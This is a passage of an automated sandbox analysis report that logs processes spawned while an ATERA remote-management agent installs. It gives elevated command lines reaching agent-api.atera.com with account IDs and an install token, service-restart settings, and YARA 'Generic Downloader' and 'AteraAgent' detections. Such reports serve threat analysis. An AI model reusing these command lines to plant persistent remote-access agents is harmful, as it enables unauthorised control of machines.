                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x26ad1980000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1CDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582267189.0000026AD1E90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1595672822.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582648644.0000026AD23B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582648644.0000026AD2423000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:11:19:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1a113ae0000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113DF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609284413.000001A1145C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609162164.000001A113FB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113D69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609284413.000001A1145B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609284413.000001A114541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:11:19:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:11:19:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                        Imagebase:0x1a880f30000
                                                                                                                                                                                                                                        File size:145'968 bytes
                                                                                                                                                                                                                                        MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A8819BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2141115637.000001A8810EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2141115637.000001A8810CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A8822B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881D3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2398266422.000001A89A5E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2398266422.000001A89A5D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2132786972.0000008326CF5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A8821BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2486369550.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2140198876.000001A880FE0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2148582502.000001A881320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2141115637.000001A88111D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881F0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2141115637.000001A881090000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2398266422.000001A89A5C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A882139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A8821DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                        Imagebase:0x7ff6be5f0000
                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x246babe0000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1871410014.00000246D408C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1850146314.00000246BAC90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB83F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB895000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB703000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1850146314.00000246BACCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1869079439.00000246D3EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1876075964.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1850146314.00000246BACDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1857899782.00000246BAFB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.1860673712.00000246BB7D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff71e3c0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000003.1635110497.000001E04A2B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.1712115953.000001E04A290000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.1712115953.000001E04A2B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.1712115953.000001E04A29C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000003.1634606587.000001E04A4E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000003.1711140575.000001E04A2B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.1712292316.000001E04A4C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x27054f00000
                                                                                                                                                                                                                                        File size:74'288 bytes
                                                                                                                                                                                                                                        MD5 hash:749C51599FBF82422791E0DF1C1E841C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2170525081.0000027055191000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2185783714.00000270558E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2266637366.000002706E196000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000000.1634120098.0000027054F02000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
